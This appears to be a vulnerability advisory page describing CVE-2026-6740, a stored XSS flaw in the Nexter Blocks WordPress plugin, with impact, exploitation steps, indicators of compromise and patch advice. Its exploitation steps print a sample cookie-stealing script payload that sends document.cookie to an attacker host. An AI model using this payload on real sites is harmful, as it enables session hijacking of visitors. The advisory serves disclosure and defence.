CVE-2026-6740
WordPress Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-6740 is a Stored Cross-Site Scripting (XSS) vulnerability in the Nexter Blocks – Gutenberg Blocks, Page Builder & AI Website Builder plugin for WordPress. It affects all versions up to and including 4.7.4, caused by insufficient input sanitization and output escaping of the commentIcon parameter. Authenticated attackers with contributor-level access or above can inject arbitrary web scripts into pages that execute in the browsers of any user visiting the affected page. It was published on July 8, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).

Détails techniques

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The root cause is insufficient sanitization of the commentIcon parameter in the plugin's tp-post-meta block handler (classes/blocks/tp-post-meta/index.php), where user-supplied input is stored and later rendered without proper escaping. An authenticated contributor can craft a malicious payload in the commentIcon field that is persisted to the database and subsequently executed in the browser of any visitor loading the affected page. The attack vector is network-based, requires low privileges (contributor role), and no user interaction beyond page visitation (GitHub Advisory, Wordfence).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user's browser session when they visit an injected page. This can result in session cookie theft, credential harvesting, user redirection to malicious sites, page content defacement, or performing unauthorized actions on behalf of victims. While availability is not directly impacted, the confidentiality and integrity of user sessions and site content are at risk across all visitors to affected pages (GitHub Advisory, Wordfence).

Étapes d’exploitation

  1. Obtain contributor access: Register or compromise a WordPress account with at least contributor-level privileges on a target site running Nexter Blocks ≤ 4.7.4.
  2. Create or edit a post: Navigate to the WordPress editor and add a Post Meta block (tp-post-meta) provided by the Nexter Blocks plugin.
  3. Inject malicious payload: In the commentIcon parameter field, insert a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent SVG/event-handler-based payload.
  4. Publish the page: Save and publish the post or page containing the injected block, causing the malicious script to be stored in the WordPress database.
  5. Trigger execution: When any user (including administrators) visits the affected page, the injected script executes in their browser, enabling session cookie theft, credential harvesting, or further malicious actions (GitHub Advisory, Wordfence).

Indicateurs de compromis

  • Database/Content: WordPress posts or pages containing unexpected <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads within the commentIcon field of Post Meta blocks.
  • Logs: WordPress access logs showing POST requests to /wp-admin/post.php or REST API endpoints (/wp-json/wp/v2/posts) from contributor-level accounts containing suspicious script content in block attributes.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after loading pages with Nexter Blocks Post Meta components; unusual referrer patterns in web server logs.
  • Browser/Client: Users reporting unexpected redirects, pop-ups, or session anomalies after visiting specific WordPress pages built with the Nexter Blocks plugin.

Atténuation et solutions de contournement

Update the Nexter Blocks plugin to a version above 4.7.4, which includes the fix applied in changeset 3512686 to classes/blocks/tp-post-meta/index.php (GitHub Advisory). As an interim measure, restrict contributor-level and above access to only fully trusted users, and consider disabling the plugin if it is not actively required. Site administrators should also audit existing pages using the Post Meta block for signs of injected malicious scripts (Wordfence).

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté WordPress Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-5523HIGH8.8
  • divi-form-builder
NonOuiJul 09, 2026
CVE-2026-6820HIGH7.2
  • vikbooking
NonOuiJul 08, 2026
CVE-2026-6740MEDIUM6.4
  • the-plus-addons-for-block-editor
NonOuiJul 08, 2026
CVE-2026-6459MEDIUM6.4
  • essential-addons-for-elementor-lite
NonOuiJul 08, 2026
CVE-2026-5459MEDIUM5.3
  • wp-user-frontend
NonOuiJul 08, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités